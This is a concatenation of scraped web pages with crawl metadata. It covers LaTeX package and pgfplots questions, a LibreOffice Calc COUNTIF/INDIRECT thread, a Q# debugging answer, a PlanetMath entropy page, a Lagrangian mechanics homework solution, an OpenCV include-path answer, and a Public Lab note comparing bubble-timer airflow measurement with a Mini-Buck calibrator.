{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8621944785118103, "perplexity": 664.8456103681248}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662619221.81/warc/CC-MAIN-20220526162749-20220526192749-00142.warc.gz"}
http://tex.stackexchange.com/questions/linked/2063?sort=newest
### Standalone package installation [duplicate] (21 views)
I want to include a table in a tex file and I get this error: ! LaTeX Error: File `standalone.sty' not found. Type X to quit or to proceed, or enter new name. (Default extension: sty) Enter file ...

### Installing .zip packages with the MiKTeX package manager from a local repository [duplicate] (71 views)
I'm in a network where I have to use a local package repository. I would like to add some packages to this repository so that all computers using this repository can install it via the MiKTeX package ...

### How to draw the cards of a deck? (934 views)
How to draw the cards from a deck using a LaTeX package, such as TikZ?

### Package breqn is broken since MiKTeX removed package mh (815 views)
I just updated my MiKTeX 2.9 installation and the package mh was removed as it is outdated. Now the package breqn won't compile. Whenever I compile my document with breqn active, I'm prompted to download ...

### About LaTeX for a beginner [closed] (83 views)
Hullo, I'm just starting up with LaTeX. I keep getting error messages even though I feel as though everything has been done correctly. I am just doing the intro exercise which is shown from the help ...

### Macro for moving hat symbol up (191 views)
I use the mathpazo font package and I think the hat symbol is too low. Can I make a macro to change the behavior of all my hats? This question has a good example, but I don't want to have to retype all of ...

(40 views)
My notebook crashed and I copied my latex files to another pc. I tried to run my file which creates my cv and cover letter, however I get the error message: moderntimeline.sty not found I ...

### How to install mathtools package? (12k views)
I'm new to LaTeX so forgive me if the questions are dumb... I was trying to write a left-top corner superscript, and someone recommended the mathtools package on this forum: Left and right subscript. So I ...

### Accanthis font simple usage (109 views)
I am using the LaTeX Font Catalogue: http://www.tug.dk/FontCatalogue/ I can set some of the fonts, however I cannot set a lot that I want. For example, I can set "Carolmin" effectively in a document. ...
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.964632511138916, "perplexity": 3978.4579212397566}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-52/segments/1419447562872.37/warc/CC-MAIN-20141224185922-00032-ip-10-231-17-201.ec2.internal.warc.gz"}
https://ask.libreoffice.org/en/question/176298/reference-cells-for-countif-calc/
# "Reference" Cells for COUNTIF (Calc) edit Hello! I have a spreadsheet with much information about my school. Specifically speaking, the names of the students occupy a column of this spreadsheet, while at the same time the other columns carry information about each student, including the elective lessons he/she has chosen to attend (for example History, Sociology, e.t.c.). Each student belongs to a group, and each group belongs to a class (year) of my school. I need to make statistics for each group, each class (year) and the whole school, for counting how many students have chosen each one of the elective lessons. It would be really useful if I could use COUNTIF by defining the "range" of cells of each group DYNAMICALLY. I mean that instead of defining directly the range of cells for COUNTIF, it would be more effective and efficient if the first and last of this "range" could be "variables" which could be stored in other cells. For example, instead of defining directly the range for the group A1 as D5:D30, I need to store the information "D5" and "D30" in other cells (for example Z1 and Z2 respectively), and address the COUNTIF to these cells (Z1 and Z2). This is highly useful, since each year the range of cells for each group changes, and this approach needs just to change the values of the cells Z1 and Z2. Is it possible to do it? How? Thanks a lot! edit retag close merge delete Of course it is possible! The best and easiest way is to use Base, not Calc. Don't be angry, this is just a joke. But in every joke there is only a fraction of a joke - everything else is true. ( 2018-12-15 11:15:24 +0200 )edit ( 2018-12-15 11:31:43 +0200 )edit Sort by » oldest newest most voted In addition to the suggestions by @JohnSUN: There is also the function OFFSET() capable of returning a cell- or a range-reference calculated from parameter values. To address cells or cell ranges in text-form there is the ADDRESS() function. The function INDEX() helps to extract specific parts from an array (data from a rectangular range). It supports single_array-row, single_array-column, and single_array-element. All the mentioned means, at least if used with variables instead of constants only on parameter positions share a serious disadvantage: The routines of Calc organising recalculation cannot know exactly about cells needing recalculation due to probable changes in the parameters. Therefore these functions are treated as "volatile" and thus recalculate "on any change". For large sheets this is inefficient and may afflict usability with AutoCalculate enabled. Not just as a joke: A thoroughly developed database is the means of choice for your task. I don't know anything about yours school. I myself was in charge for 10 years of doing things you are talking of for a school of up to 100 teachers and 1150 students. It wouldn't only have been inefficient to do it spreadsheet-based, but also unlawful due to legal norms of my country/state concerning data security, data safety, and privacy. I also well know the disadvantages coming with the obligation to use a closed ready-made database system. Life is hard, after all. more Thank you both for your answers! It seems that you are really experienced users! The problem is that I use this spreadsheet for both storing data (information about the students) and for creating the timetable for my school (which needs all this information). For creating the timetable, I used the spreadsheet "approach" since I know how to check for errors. Can a database system cover both my needs? 
The spreadsheet checks for the timetable PLUS the statistics? Thanks again! ( 2018-12-15 14:38:04 +0200 )

I neither know your country nor anything about the school system you are working in, nor any specifics (number of teachers and students, e.g.) of your school. In the system and for the specific school I mentioned, the creation of a "time table" (detailed schedule for anything related to teaching classes) needed to be split. A first task was to assign resources (teachers and rooms mainly) to the planned/needed lessons. The second part then was the detailed scheduling. Under the specific conditions I have experience with, I had no chance to do that all with one homemade bundle of spreadsheets, even if I resorted to unlawful means. For the first part I had to work with two databases (this was abandoned meanwhile) and some intermediary spreadsheets and some special "hardware" for "creative" work. For the second part I passed the results to a specialised program and to a person ...(more) ( 2018-12-15 15:01:50 +0200 )

Thanks again! Some further details: My school has many private-like musical instrument lessons. This means one teacher teaches one student (or sometimes 2-3 students). Of course, I can use a specialized timetabling application, but this is really complicated. Even for just entering the data, I need too much time. So, in order to create the timetable (detailed schedule of my school), I use a spreadsheet and I assign each student to his/her teachers. The spreadsheet is "programmed" so that I can see whether a student is available or not, and I can check if all students have the correct lessons and the correct number of hours, if the teachers have the correct number of hours, etc. Of course the spreadsheet carries all the needed information, i.e. the group for each one of the students, musical instrument, teacher name, etc. For the part of information needed (and the ...(more) ( 2018-12-15 15:38:24 +0200 )

Yes. If this is for up to 80 or 100 students, and you are determined to solve upcoming problems again and again, you may do it with spreadsheets (the privacy complex aside). From my experience it's much easier to work in a creative way with spreadsheets (as compared with database frontends) - and it's even a bit of fun sometimes. It's much more complicated and error-prone however concerning data safety and security (including backupping and all that). It brings hard responsibilities. To advise concerning the how is difficult. There are only a few principles like: Don't mix up different functionalities in one sheet. In sheets used to keep (and maintain) data, regard the most basic principles of databasing and in addition some only applying if working with spreadsheets (except when re-building completely): - Don't physically delete. Mark "deleted" instead. - Don't change sort-order in data sheets. (Sort with option 'Copy ...(more) ( 2018-12-15 16:09:51 +0200 )

• Study the database-like tools of Calc like filters and specifically pivot tables.
• Avoid user code (with few exceptions).
Concerning database principles you may read something like https://www.essentialsql.com/get-read... e.g. (I didn't study this thoroughly myself, however.) ( 2018-12-15 16:16:40 +0200 )

Thanks a lot! ( 2018-12-15 16:23:06 +0200 )

=COUNTIF(INDIRECT(Z1&":"&Z2);"<your condition>")

Then add the OFFSET() function to shift your attention to the adjacent range of the same size:

=COUNTIF(OFFSET(INDIRECT(Z1&":"&Z2);0;1);"<your condition>")

Hello JohnSUN!
The other columns of my spreadsheet carry other types of information. For example, while column D carries the information about the elective lessons, column E (let's say cells E5 to E30 for group A1) might carry the information about gender (male, female) for each student. So, if I need to make statistics for the students' gender, I need to refer indirectly to the cells E5 and E30, which means: I need to use IDENTICAL rows as with the cells D5 and D30, but a different COLUMN. I was thinking of adding this information (the corresponding columns, for example D, E, etc.) to some specific cells and the "range" 5 to 30 (for the group A1) to different cells. Is it possible for INDIRECT to read (indirectly) both the values of the column (for example D, which is entered in the cell Z1) and the values of the number of the ...(more) ( 2018-12-15 13:23:19 +0200 )

INDIRECT simply interprets the text passed to it on its single parameter position as a text representation of a reference (often called an address) and returns the functional reference itself. The mentioned address you can calculate [compose by CONCATENATE() / the & operator / SUBSTITUTE() / LEFT() or whatever means] in any way you want. INDIRECT will not know how you did it. It only gets passed the result. ( 2018-12-15 13:51:33 +0200 )
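To make that last comment concrete, a small sketch (mine, not from the thread; the cell layout is hypothetical): suppose Y1 holds the column letter to be counted (e.g. E), and Z1 and Z2 hold the first and last row numbers of the group (e.g. 5 and 30). The address can then be composed with & before being handed to INDIRECT:

=COUNTIF(INDIRECT(Y1 & Z1 & ":" & Y1 & Z2); "female")

Changing the group's range or the column to be counted then only requires editing Y1, Z1 and Z2, not the formula itself.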
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.33163732290267944, "perplexity": 2060.720911812268}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986672431.45/warc/CC-MAIN-20191016235542-20191017023042-00438.warc.gz"}
https://quantumcomputing.stackexchange.com/questions/5877/how-do-i-do-printf-debugging-in-q-in-a-convenient-way
# How do I do printf debugging in Q# in a convenient way?

When initially writing an operator in Q#, I often want to see intermediate values of registers during the computation. This allows me to check that I haven't made mistakes. For example, if I was writing an addition circuit I would input a computational basis state and print out the computational basis states of qubits at particular key points.

I am not aware of a way to do this conveniently. If I print out the qubits like Message($"{qubit}") then I get their IDs instead of their values. That makes sense. I have to do a measurement to access their value. But if I do a measurement, then Q# will e.g. not automatically generate an adjoint operation, and this tends to cause compilation failures. Also, I don't actually want to perform a measurement (which may have side effects); I just want to peek at the simulator state. (I originally thought I could package the concept of "peeking" at a value into an operation that did a hidden measurement, which would have resolved the issue. But Q# doesn't allow operations with an adjoint to have a return type.)

Is there some built-in way to get at the computational basis value of some qubits, and print it to the console during simulation under the Toffoli simulator?

For the Toffoli simulator in particular, DumpRegister will provide this information. For example, the following code

operation XorTest() : Bool {
    using ((a, b) = (Qubit[2], Qubit[2])) {
        // initialize: a = 1, b = 2
        ApplyPauli([PauliI, PauliX], a);
        ApplyPauli([PauliX, PauliI], b);
        // check initialization
        Message("a = ");
        DumpRegister((), a);
        Message("b = ");
        DumpRegister((), b);
        // calculate a ⊕ b and write it to b
        CNOT(a[0], b[0]);
        CNOT(a[1], b[1]);
        // check result: a ⊕ b = 3
        Message("a xor b = ");
        DumpRegister((), b);
    }
    return true;
}

will print the following result (and throw an exception in the end because the qubits are released not in the zero state):

a =
State:
0: False
1: True
b =
State:
2: True
3: False
a xor b =
State:
2: True
3: True

The numbers before the values are qubit ids.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.38024523854255676, "perplexity": 2188.618909813356}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590347425148.64/warc/CC-MAIN-20200602130925-20200602160925-00015.warc.gz"}
http://planetmath.org/topologicalentropy
topological entropy

Synonym: entropy
Type of Math Object: Definition
Major Section: Reference
Mathematics Subject Classification

entropy of ergodic and mixing processes

Very interesting definition. If I grok it correctly, it seems to be saying that ergodic processes will have a low entropy in general, which is surprising and counter-intuitive. The only systems I can think of that would have high entropy would be dissipative systems, where, on iteration, large portions of the space ''X'' are abandoned and never visited again. So ... is this entropy in fact a measure of dissipation? Can any other intuitive interpretations be added? --linas

Re: entropy of ergodic and mixing processes

Never mind. I've (once again) got the definition exactly upside-down.

Re: entropy of ergodic and mixing processes

Soo .. is there any way to simply erase/retract/edit/modify this line of posts? I clearly misread the defn (again), so the comment I just made earlier is nonsense.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 23, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9727462530136108, "perplexity": 2331.805006627683}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-15/segments/1398223207985.17/warc/CC-MAIN-20140423032007-00338-ip-10-147-4-33.ec2.internal.warc.gz"}
http://me598.wikidot.com/homework-3-problem-10
Homework 3 Problem 10

Problem

Give an example of a Lagrangian system that has a degenerate Lagrangian $L:T \mathbb{R}^{2}\rightarrow \mathbb{R}$ but a second-order Lagrangian vector field $Z_{L}$.

Melih's Solution:

Let

(1)
\begin{align} L:T\mathbb{R}^{2}\rightarrow \mathbb{R}:(q_{1},q_{2},\dot{q}_{1},\dot{q}_{2})\mapsto \pounds =\frac{1}{2}\dot{q}_{1}^{2}+\frac{1}{2}q_{1}^{2}q_{2}+\lambda \dot{q}_{2} \end{align}

Using this, we can obtain a coordinate expression for the Lagrangian two-form $\Omega_L$ as a $4\times 4$ matrix. Let $B$ be the skew-symmetrization of $\frac{\partial ^{2}L}{\partial \dot{q}_{i}\partial q_{j}}$.

(2)
\begin{array} {ll} \Omega_L& =\begin{bmatrix} B & \left[ \frac{\partial ^{2}L}{\partial \dot{q}_{i}\partial \dot{q}_{j}}\right] \\ \left[ -\frac{\partial ^{2}L}{\partial \dot{q}_{i}\partial \dot{q}_{j}}\right] & 0 \end{bmatrix}\\~\\ &= \begin{bmatrix}0 & 0 & 1 & 0 \\ 0 & 0 & 0 & 0 \\ -1 & 0 & 0 & 0 \\ 0 & 0 & 0 & 0\end{bmatrix} \end{array}

This is singular at every point, so the Lagrangian is degenerate. Also note that the dynamics of a bead moving in the plane under this Lagrangian has a constraint on the velocity in the $2$-direction.

The Legendre transform $FL:T\mathbb{R}^{2}\rightarrow T^{\ast }\mathbb{R}^{2}$ $:(q_{i},\dot{q}_{i})\mapsto \left( q_{i},\frac{\partial L}{\partial \dot{q}_{i}}\right)$ is found as

(3)
\begin{align} FL=(q_{1},q_{2},\dot{q}_{1},\lambda ) \end{align}

The action of $L$; $A:T\mathbb{R}^{2}\rightarrow \mathbb{R}:(q_{1},q_{2}, \dot{q}_{1},\dot{q}_{2})\mapsto A=FL(v)\cdot v$ for $v\in T_{q}\mathbb{R}^{2}\Rightarrow$

(4)
\begin{align} A=\left\langle \frac{\partial L}{\partial \dot{q}_{i}},\dot{q}_{i}\right\rangle =\dot{q}_{1}^{2}+\lambda \dot{q}_{2}. \end{align}

The energy of $L$;

(5)
\begin{align} E:T\mathbb{R}^{2}\rightarrow \mathbb{R}:(q_{1},q_{2},\dot{q}_{1},\dot{q}_{2})\mapsto E=A-L=(\dot{q}_{1}^{2}+\lambda\dot{q}_{2})-(\frac{1}{2}\dot{q}_{1}^{2}+\frac{1}{2}q_{1}^{2}q_{2}+\lambda\dot{q}_{2})=\frac{1}{2}\dot{q}_{1}^{2}-\frac{1}{2}q_{1}^{2}q_{2}\Rightarrow \end{align}

(6)
\begin{align} dE=\dot{q}_{1}d\dot{q}_{1}-q_{1}q_{2}dq_{1}-\frac{1}{2}q_{1}^{2}dq_{2}. \end{align}

Since $dE=Z_{L}\lrcorner \Omega _{L}+w$, where

(7)
\begin{align} \Omega _{L}=\frac{\partial^{2}L}{\partial \dot{q}_{i}\partial q_{j}}dq_{i}\wedge dq_{j}+\frac{\partial^{2}L}{\partial \dot{q}_{i}\partial \dot{q}_{j}}dq_{i}\wedge d\dot{q}_{j}=dq_{1}\wedge d\dot{q}_{1} \end{align}

and $w$ is the one-form exterior force;

(8)
\begin{align} Z_{L} =(\dot{q}_{1},-q_{1}q_{2}) \end{align}

(9)
\begin{align} w =-\frac{1}{2}q_{1}^{2}dq_{2} \end{align}

i.e. there exists a second-order vector field, $Z_{L}$, such that

(10)
\begin{align} Z_{L_{q_{1}}} = \dot{q}_{1} \end{align}

(11)
\begin{align} Z_{L_{\dot{q}_{1}}} = -q_{1}q_{2} \end{align}

with the constraint $\dot{q}_{2}=0$.

Discussion

Please check the Lagrangian I suggested.

page revision: 3, last edited: 21 Apr 2007 21:31
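A quick way to see the degeneracy directly (an added check, not part of the original solution): the velocity Hessian of this Lagrangian is

\begin{align} \left[\frac{\partial ^{2}L}{\partial \dot{q}_{i}\partial \dot{q}_{j}}\right]=\begin{bmatrix}1 & 0\\ 0 & 0\end{bmatrix}, \end{align}

which is singular, so $FL$ is not a local diffeomorphism; this is the same degeneracy visible in the zero rows and columns of the $4\times 4$ matrix in (2).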
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 10, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9999972581863403, "perplexity": 4551.640732846266}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-51/segments/1512948511435.4/warc/CC-MAIN-20171210235516-20171211015516-00350.warc.gz"}
http://tex.stackexchange.com/questions/297590/unable-to-plot-both-axes-and-arccos-function-in-pgfplots
# Unable to plot both axes and arccos function in pgfplots

What I want to plot is 3 functions: x=0, y=0, and y=cos^{-1}(x). The plot and graph of the first two look like this:

\begin{center}
\begin{tikzpicture}
\begin{axis}[domain = -1:1, samples = 500, grid = both]
\addlegendentry{$x=0$}
\addlegendentry{$y=0$}
\end{axis}
\end{tikzpicture}
\end{center}

\begin{center}
\begin{tikzpicture}
\begin{axis}[domain = -1:1, samples = 500, grid = both]
\addlegendentry{$x=0$}
\addlegendentry{$y=0$}
\addlegendentry{$\cos^{-1}(x)$}
\end{axis}
\end{tikzpicture}
\end{center}

Everything gets messed up. Why is this?

-

The horizontal domain gives the impression that nothing has changed, but because the vertical axis has suddenly grown to around 150, domain=-1:1 becomes invisible. Also, you are using 500 samples for constant plots. Supply the samples individually instead; here it is with 130

\begin{tikzpicture}
\begin{axis}[grid = both,samples=2]
\addlegendentry{$x=0$}
\addlegendentry{$y=0$}
\addplot[draw = blue,samples = 101,domain = -1:1] {acos(x)};
\addlegendentry{$\cos^{-1}(x)$}
\end{axis}
\end{tikzpicture}

-

That makes a lot of sense! It didn't occur to me that this was the issue because in my mind domain was the opposite direction. And thank you for the suggestion about the samples! – Abe Fehr Mar 6 at 13:17

@AbeFehr My pleasure – percusse Mar 6 at 13:54

As it turns out, pgfplots (and the underlying PGF, I think) treats trigonometric functions in degrees, not radians, so acos(x) comes back in the range 0 to 180. You can force it to use radians with the key trig format=rad. This also fixes your y-domain issues:

\documentclass{standalone}
\usepackage{pgfplots}
\pgfplotsset{compat=1.13}
\begin{document}
\begin{tikzpicture}
\begin{axis}[domain = -1:1, samples = 500, grid = both]
\addlegendentry{$x=0$}
\addlegendentry{$y=0$}
\addlegendentry{$\cos^{-1}(x)$}
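For anyone curious about the scale of the effect described in the answers, here is a small numeric illustration (my own, not from the thread): in degree mode the arccos curve spans roughly 0 to 180, which is why the constant plots over x in [-1, 1] get squashed against the axis.

```python
# Compare acos in radians (what one might expect) with degrees (pgfplots' default)
import math

for x in (-1.0, -0.5, 0.0, 0.5, 1.0):
    rad = math.acos(x)        # radians: 0 .. pi (about 0 .. 3.14)
    deg = math.degrees(rad)   # degrees: 0 .. 180, the range pgfplots plots by default
    print(f"x={x:+.1f}  acos(rad)={rad:5.2f}  acos(deg)={deg:6.1f}")
```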
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8496245741844177, "perplexity": 2405.8231202005554}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-26/segments/1466783397795.31/warc/CC-MAIN-20160624154957-00144-ip-10-164-35-72.ec2.internal.warc.gz"}
https://answers.opencv.org/answers/14542/revisions/
# Revision history [back]

usually they contain the old c-api functionality. you should never need to include them directly to access the c-api, you'd go like:

#include <opencv/highgui.h>

for the c++ (2.x) api:

#include <opencv2/highgui/highgui.hpp>

don't resort to hacking, you won't get far that way. there must be something wrong in your vcproj file, or the install. there's 2 ways to get the headers right:

• easy (using the prebuilt stuff): point your "Additional Include Dirs" at opencv/build/include (it should just work, if that folder contains all the necessary headers). note that if you build your own libs, cmake might install the headers in a "build/install/include" folder, check with cmake-gui where things go!
• hard (but safe): point your "Additional Include Dirs" at opencv/include, and additionally, for each module, add its module path, like opencv/modules/highgui/include, opencv/modules/core/include, ... more work, but this way you don't depend on install things. (that's what cmake does, when you ask it to generate your own project depending on opencv)
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.15014946460723877, "perplexity": 18114.650172394602}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178356456.56/warc/CC-MAIN-20210226085543-20210226115543-00419.warc.gz"}
https://publiclab.org/notes/mathew/06-11-2015/mini-buck-vs-the-bubbles
# Mini-Buck vs. the Bubbles

by mathew | 11 Jun 00:14

mathew was awarded the Empiricism Barnstar by liz for their work in this research note.

### What I want to do

Compare the $10 stopwatch & bubbles airflow monitoring technique @davidmack suggested to a $970 NIST-traceable pump calibrator called the mini-buck recommended to @NickShapiro.

### My attempt and results

It was a bit sensational to call this research note "Mini-Buck vs. the Bubbles" since the Mini-Buck is an automated bubble measuring machine. A breakdown of how it works and is designed is in the bottom section, "How the mini-buck works."

For this comparison I checked the flow of 3 used formaldehyde tubes and our lending library air pump prototype. I used the Mini-buck and the same graduated cylinder and bubbles method detailed here.

- Tube #1: times to travel 200 ml were 36.67, 36.54, 36.36 s. Mini-Buck flow rate: 335 mL/min (three identical tests)
- Tube #2: times to travel 200 ml were 38.90, 38.74, 38.78 s. Mini-Buck flow rate: 313 mL/min (two tests at 313, one at 312)
- Tube #3: times to travel 200 ml were 39.78, 39.64, 39.57 s. Mini-Buck flow rate: 305 mL/min (three identical tests)

### Questions and next steps

My polypropylene graduated cylinder has a flow reading 1-2% lower than the mini-Buck. This could be the tolerances of the cylinder, or temperature dependent, as it is calibrated for 20 degrees and I did these tests at 27 (Celsius). I'm not going to apply a correction for now; I think more work is needed to prove that. Overall though, I'm impressed with the performance of the graduated cylinder and stopwatch.

### how the Mini-Buck M-30 works

Mini-buck is a design in the public domain now, since its patent (4860590) expired several years ago.

How it works: The measurement chamber is made out of a transparent acrylic tube*. On the bottom is a reservoir for bubble solution, and a spring-powered bubble wand with a wider diameter than the acrylic tube. When the button is depressed a bubble is made on the wand. As the wand moves back up to the acrylic tube, the bubble attaches itself evenly to the tube's bottom.

*I'm guessing the tube is acrylic since there are warnings about cleaning with acetone. It may be polycarbonate, as suggested in the patent.

The bubbles always travel upwards, and to get the tube soaped up, one repeatedly presses the button to send bubbles up the acrylic tube until they start making it to the top (see above).

At the top of the chamber is a catchment for the bubbles to prevent them from entering the air line. The main acrylic tube is capped, and below the cap are four holes offset evenly around the circle. These holes exit into a wider tube surrounding the capped top of the main tube. From there a 1/4" air hose nipple draws air. Depending on whether one wants to pull or push air through the chamber, the air line is attached to the top or bottom, and the second air line connector is left open to the atmosphere.

The Mini-Buck automates bubble detection with two matched sets of infrared emitters and sensors. When a bubble passes up the chamber an IR diode detects an interruption in the infrared light coming off an LED. A view of the two detectors: with the chamber taken out, the sensors can be seen oriented opposite each other. Note the IR LED's light is choked down by a pinhole in the case. That may be why I couldn't seem to get a reading on the LEDs with a Public Lab Spectrometer. I tried reflecting them off paper and other materials but to no avail. They could also be 960nm or another wavelength that the spectrometer isn't very sensitive in.
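Purely to illustrate the timing principle described above, here is a rough sketch of how an automated bubble meter can turn one transit time into a flow rate. This is my own illustration, not the Buck's firmware, and the dimensions are made-up placeholders, not the real M-30 geometry.

```python
# Flow rate from a single bubble transit between two optical gates:
# swept volume (tube cross-section x gate spacing) divided by transit time.
import math

TUBE_INNER_DIAMETER_CM = 1.0   # placeholder, not the real M-30 value
GATE_SPACING_CM = 10.0         # placeholder spacing between the two IR sensor pairs

def flow_ml_per_min(transit_time_s: float) -> float:
    """Volume swept by the bubble between the gates, divided by transit time."""
    area_cm2 = math.pi * (TUBE_INNER_DIAMETER_CM / 2.0) ** 2
    swept_volume_ml = area_cm2 * GATE_SPACING_CM   # 1 cm^3 == 1 ml
    return swept_volume_ml / transit_time_s * 60.0

print(flow_ml_per_min(1.5))    # a 1.5 s transit -> ~314 ml/min with these placeholder numbers
```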
Inside the MiniBuck is a PIC16F914, an 8-bit microcontroller running at 8 MHz, with an internal real time clock, and an LMC6464 amplifier I'm assuming is used to either amplify the signal from the IR photodiodes or power the LEDs.

Calibrating the Mini-Buck: The manual recommends calibration to a NIST-traceable stopwatch and a bubble traveling through a NIST-traceable 1000 ml buret at a flow rate of 1 L/min.

### Why I'm interested

